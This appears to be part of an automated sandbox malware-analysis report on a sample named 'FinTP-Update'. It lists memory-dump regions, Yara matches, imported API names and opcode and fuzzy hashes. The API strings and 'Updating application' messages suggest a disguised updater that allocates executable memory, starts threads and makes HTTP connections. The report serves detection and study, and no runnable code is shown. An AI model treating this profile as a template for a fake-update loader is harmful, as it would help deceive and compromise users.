                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$memcpy$closesocketinet_addrmemcmpmemsetrecvstrstr$connectgethostbyaddrgethostbynamehtonsmemchrreallocsendsocketstrncpy
                                                                                                                              • String ID: $$GET %s HTTP/1.0$Host: %s$http://$https://
                                                                                                                              • API String ID: 338878132-2968714747
                                                                                                                              • Opcode ID: f4544bdd155f1d28083635d9b932877552d55bbdf9cf6c65b63fa57cc515c7a3
                                                                                                                              • Instruction ID: 87ff23f1e8e077276e014ddaddf721f4f49729c04da42b0bf13dc135d96b35e2
                                                                                                                              • Opcode Fuzzy Hash: f4544bdd155f1d28083635d9b932877552d55bbdf9cf6c65b63fa57cc515c7a3
                                                                                                                              • Instruction Fuzzy Hash: 0652B362F28E8184FB00AFA4D4402BDA771FB457B8F90423ADA5D16AD9DF7CD18A9310

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: NameUser_snprintfmallocstrrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1238167203-0
                                                                                                                              • Opcode ID: c24ca2868907c159accd8f7be344c53e6b7ed4974712dc99e21be6ab25bf09ce
                                                                                                                              • Instruction ID: 5d1d2f5e2a0f357abcd911f09cf4587fb932f50d976b577d25fa0a13895527d0
                                                                                                                              • Opcode Fuzzy Hash: c24ca2868907c159accd8f7be344c53e6b7ed4974712dc99e21be6ab25bf09ce
                                                                                                                              • Instruction Fuzzy Hash: 5A51843075CA081FEF48AB6894517EA72E2F799710F10453EE49FC3293DA28D847C7A6

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$ConnectInternetfree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 965413-0
                                                                                                                              • Opcode ID: 5aabf42a8016127458e22bf438d3e268bf8595d0ceb33982a71ba00672c520a2
                                                                                                                              • Instruction ID: a86fbde699836e57c25f2066cfc18ded4e1ac0b3dbde3d3e1c14732908e81840
                                                                                                                              • Opcode Fuzzy Hash: 5aabf42a8016127458e22bf438d3e268bf8595d0ceb33982a71ba00672c520a2
                                                                                                                              • Instruction Fuzzy Hash: B141537065C7488FDB68DF28D48677AB3E5F788300F11467EA49EC3652DE34D8428B82

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: a351bf691c5bdb53e2b7e774b1a1d9c194311787cdf8ded2f5e394424e519b03
                                                                                                                              • Instruction ID: 834c4133f00277bfa822f1d3b5ddd0b92654e2ada826ab11ff4a1938458e7504
                                                                                                                              • Opcode Fuzzy Hash: a351bf691c5bdb53e2b7e774b1a1d9c194311787cdf8ded2f5e394424e519b03
                                                                                                                              • Instruction Fuzzy Hash: 4971823075CA089BDB589F2C94563BB73E1F798301F21563EA45FC3292DE78E806C691

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: 87192b8403120d693fe24ea079f8caafcfb62f8a7e8f8da486ee7cecc701e9b1
                                                                                                                              • Instruction ID: 7fe21b564331d4a2828de460e6bd1428267c821266c35b3bf845d84a00da859f
                                                                                                                              • Opcode Fuzzy Hash: 87192b8403120d693fe24ea079f8caafcfb62f8a7e8f8da486ee7cecc701e9b1
                                                                                                                              • Instruction Fuzzy Hash: 5071743075CA089BEB699F2898553AB73F5F798301F11963EE45FC3292DE38D8068791

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              • Opcode ID: b74e7394ccdf12cbb4f8910d633926de710000661419715a8c12651b1650f032
                                                                                                                              • Instruction ID: 712eeb17102d73491350a036f814b3c7797afb02e1fbf3979a2cf3445cd7d2d4
                                                                                                                              • Opcode Fuzzy Hash: b74e7394ccdf12cbb4f8910d633926de710000661419715a8c12651b1650f032
                                                                                                                              • Instruction Fuzzy Hash: 8D319E3068CA089FEB94EF2C985476B73E5F798301F20493E945FC32A1DA39D846C7A1

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$memcpy$closesocketinet_addrmemsetrecvstrstr$connectgethostbyaddrgethostbynamehtonsmemcmpreallocsendsocketstrncpy
                                                                                                                              • String ID: $$GET %s HTTP/1.0$Host: %s
                                                                                                                              • API String ID: 1237530833-1199678302
                                                                                                                              • Opcode ID: 491bdc39617c2d4fbda6a589d3acd15e0bc547e4d127c979532ea07d9f50ec93
                                                                                                                              • Instruction ID: fe9858fe3cfa5e2aa2f82f2a246023439e8c8143196b7fc6be13d190e29b069e
                                                                                                                              • Opcode Fuzzy Hash: 491bdc39617c2d4fbda6a589d3acd15e0bc547e4d127c979532ea07d9f50ec93
                                                                                                                              • Instruction Fuzzy Hash: 9BC1C722A28EC294FB11AF65D4403A9A771FB857B8F80423ADA5D437E9DF7CD14AC710

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SleepVirtualWindowprintf$AllocCleanupConsoleCreateObjectProtectShowSingleStartupThreadWaitmemcpy
                                                                                                                              • String ID: Update complete !$Updating application ...
                                                                                                                              • API String ID: 2191805314-1739653217
                                                                                                                              • Opcode ID: ea505142da3b1c8c6b0211f56f9505a3b07cd727c9395d2fbfd05c6d3ee2bf9c
                                                                                                                              • Instruction ID: d9091ece72d481c4cfcc3c61b69cc5d7eb71a296d0caaea2a4b3c15441d5a9b2
                                                                                                                              • Opcode Fuzzy Hash: ea505142da3b1c8c6b0211f56f9505a3b07cd727c9395d2fbfd05c6d3ee2bf9c
                                                                                                                              • Instruction Fuzzy Hash: 26417821A2CE8285E750AF61E4503BAB370FB857A8F84403ADA8E53759CF3DE14E9710

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7193c0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __scrt_fastfail__scrt_is_nonwritable_in_current_image$__p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1818695170-0
                                                                                                                              • Opcode ID: e4a4f67a1c2f8c8663ba82bb76dce1e56913a2b9a4e96379217b23346b38f8d0
                                                                                                                              • Instruction ID: 482b28af650912f0354e38f8d9484b01f08dd1394b4ef7ce295e5b7aa4a4365d
                                                                                                                              • Opcode Fuzzy Hash: e4a4f67a1c2f8c8663ba82bb76dce1e56913a2b9a4e96379217b23346b38f8d0
                                                                                                                              • Instruction Fuzzy Hash: AB312A21A28E4341EA14BF2194153B9D3B1AF557ACFC0403FEA4E172D7CE6DE54E8230

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _snprintf$strchr$AvailableDataInternetQuery_errno_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2459009813-0
                                                                                                                              • Opcode ID: 1aad2df4db7f9b33c718916bc1ec6991ba60bfa05de455732afd7a7ac3088db8
                                                                                                                              • Instruction ID: e506d4d2fa7ad6d663e29ee7721b1c63452070761e351ce554fcb8418384b831
                                                                                                                              • Opcode Fuzzy Hash: 1aad2df4db7f9b33c718916bc1ec6991ba60bfa05de455732afd7a7ac3088db8
                                                                                                                              • Instruction Fuzzy Hash: 5E81CF3065CA488FEB58EB28D8956FAB3F5FB94301F00052EE45BC3292DA68D906C791

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: IoctlSocketclosesocket
                                                                                                                              • String ID: _Cy
                                                                                                                              • API String ID: 3445158922-1085951347
                                                                                                                              • Opcode ID: 7ade8901dc0e9bc1a44b3ba1fcf56bbacaca6f1dd20d958bee93b1ad89b8896f
                                                                                                                              • Instruction ID: 8a51113d4d58a6838b850217c3c2503cb854ca9e93c419c7a3b27b9b238f6e50
                                                                                                                              • Opcode Fuzzy Hash: 7ade8901dc0e9bc1a44b3ba1fcf56bbacaca6f1dd20d958bee93b1ad89b8896f
                                                                                                                              • Instruction Fuzzy Hash: 4631933065CB488BDB949F28D8843AAB7F5FBA8315F14067EE45EC3191EB34C452C741

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$InternetOpenfree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2307133132-0
                                                                                                                              • Opcode ID: b2e8de380762abf8ea4d3ef2843784360b0cc5212c0f5113b7e3339b7f98fd85
                                                                                                                              • Instruction ID: 0498331f1e05bdfc78de534579d2094cc78427799eb1a613226da1027fbb77ac
                                                                                                                              • Opcode Fuzzy Hash: b2e8de380762abf8ea4d3ef2843784360b0cc5212c0f5113b7e3339b7f98fd85
                                                                                                                              • Instruction Fuzzy Hash: ED316F31A5C6488BDB68EE38944227BB3E1F799315F119A3EA09FC3642DE35D8038781

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3357889080.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017F36AE0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f36ae0000_FinTP-Update.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 828da02b92ecf590f0f370cdf11f92f09e128223337482a552d2b00b7cfb072a
                                                                                                                              • Instruction ID: b173d192f2c6839ac3f6a891eca96d2ea57dd4adaf522b940a4ca59579add0ca
                                                                                                                              • Opcode Fuzzy Hash: 828da02b92ecf590f0f370cdf11f92f09e128223337482a552d2b00b7cfb072a
                                                                                                                              • Instruction Fuzzy Hash: F901B630128A489FEA84EB18C499FAAB7E1FB84701F84586CF059C32D2C6249C91DB01
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                              • String ID: $@
                                                                                                                              • API String ID: 3613058218-1077428164
                                                                                                                              • Opcode ID: 5b0677129746c5e641d238aafdfd8f825d1c5b663ef83c096bbd024f921d9b13
                                                                                                                              • Instruction ID: f63a3546dca0948a3488463eca49ddcf31f114fbaf2051ba9a48672caa5347be
                                                                                                                              • Opcode Fuzzy Hash: 5b0677129746c5e641d238aafdfd8f825d1c5b663ef83c096bbd024f921d9b13
                                                                                                                              • Instruction Fuzzy Hash: 6462D63099C6699AEF68AA58C4513EBF7F1FB55302F24093DD4ABC37D1D62CA803C661
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3613058218-3916222277
                                                                                                                              • Opcode ID: efe04834c9c52b6c82cb06a2b6ce24504f7a3b8eb651434d1436ff47e6ed4f74
                                                                                                                              • Instruction ID: 5b21d32e03addf1b189d5165d87b839ad5632d76b0acf7d14d1c1433d39900e7
                                                                                                                              • Opcode Fuzzy Hash: efe04834c9c52b6c82cb06a2b6ce24504f7a3b8eb651434d1436ff47e6ed4f74
                                                                                                                              • Instruction Fuzzy Hash: D262EA3099CA499AFF68AA5894513EB77F1FB95300F24493DD4AFC33D2D62CA803D661
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                                                              • String ID: @$U
                                                                                                                              • API String ID: 3902385426-1013562545
                                                                                                                              • Opcode ID: 41868c28f8d137dea5cf0ce0dd7f38ed136a82522b4c3818ae4a04fefbd99508
                                                                                                                              • Instruction ID: a36a315faf1c51da960ef30b13f9807d40b43839828aad2b2fb9c933728f326b
                                                                                                                              • Opcode Fuzzy Hash: 41868c28f8d137dea5cf0ce0dd7f38ed136a82522b4c3818ae4a04fefbd99508
                                                                                                                              • Instruction Fuzzy Hash: 1022B33015CA489BEB28BB18C8857EBB7F1FBD5300F10093DE59AC3292DA3DE946C655
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _snprintf$_errno_flsbuf_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3206768600-0
                                                                                                                              • Opcode ID: 2f5fa6688b9c8f5a6b87aeccace7b411b410f6383500c904992cea95a9c01413
                                                                                                                              • Instruction ID: 49337f04d814a6ba1a017532d9ea1b7b5cd67c610e914731048b05b709531cbc
                                                                                                                              • Opcode Fuzzy Hash: 2f5fa6688b9c8f5a6b87aeccace7b411b410f6383500c904992cea95a9c01413
                                                                                                                              • Instruction Fuzzy Hash: 2A52913055CD84AAEB59AB2CD4117E6F3F0FFA8305F445228D99AC7152EB38E587C7A0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$_snprintf$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 132319360-0
                                                                                                                              • Opcode ID: 14da4661c7deebced807616e984bea43d344ea1cc427452d8eefa305cda0c36c
                                                                                                                              • Instruction ID: 3e51e436c57f367f3d7b51a053972bef635c9dde1d29b3ea7762e556c521c88e
                                                                                                                              • Opcode Fuzzy Hash: 14da4661c7deebced807616e984bea43d344ea1cc427452d8eefa305cda0c36c
                                                                                                                              • Instruction Fuzzy Hash: A9023E3064CA045AEF58FB68D4A67EA72B1FB84300F50453DA56EC32D7DE2C990BC6B5
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _initp_misc_winsig
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2710132595-0
                                                                                                                              • Opcode ID: 672d5a6a102d9c6f2e4ab4917c4b4192c11964095447964a51fc792122134f08
                                                                                                                              • Instruction ID: 332f569cf270984f4dd322c5bb57f0cfaeea1c388c04f6671cc5559b74e9c6ac
                                                                                                                              • Opcode Fuzzy Hash: 672d5a6a102d9c6f2e4ab4917c4b4192c11964095447964a51fc792122134f08
                                                                                                                              • Instruction Fuzzy Hash: 3EA1EB71619E088FFF45EFB5EC98ADA3BA6F768302310892A910AC3170DB7CD545CB41
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0cbf232277f3f15e01563b74e11d0eb1f3cf9f834ab0d91de43518fd2f9e5d70
                                                                                                                              • Instruction ID: 063996cff421bf7cdef8de8144f50910f1d03ccf127efae771cff4ae646a3ba1
                                                                                                                              • Opcode Fuzzy Hash: 0cbf232277f3f15e01563b74e11d0eb1f3cf9f834ab0d91de43518fd2f9e5d70
                                                                                                                              • Instruction Fuzzy Hash: 9262FB312286558FD31CCB1CC5B1B7AB7E1FB89340F44896DE28BCB692C639E945CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1aaa7745e0cdbdf1d33799742b41e3b5edfa25ed5a0a9f8fbdb68c74659c64a2
                                                                                                                              • Instruction ID: b4ccdb8c23fdf1f982f47d6520900b08b2516575b0b89303cac38a31a01b1f8b
                                                                                                                              • Opcode Fuzzy Hash: 1aaa7745e0cdbdf1d33799742b41e3b5edfa25ed5a0a9f8fbdb68c74659c64a2
                                                                                                                              • Instruction Fuzzy Hash: 2352ED312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE286CB692C639E545CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: malloc$free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1480856625-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358718622.00007FF7193C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7193C0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.3358679512.00007FF7193C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358756049.00007FF7193C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358795453.00007FF7193C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                              • Associated: 00000000.00000002.3358830369.00007FF7193C6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 388111225-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2644381645-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1078912150-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2464146582-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2140805544-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: free$_errno
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2288870239-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
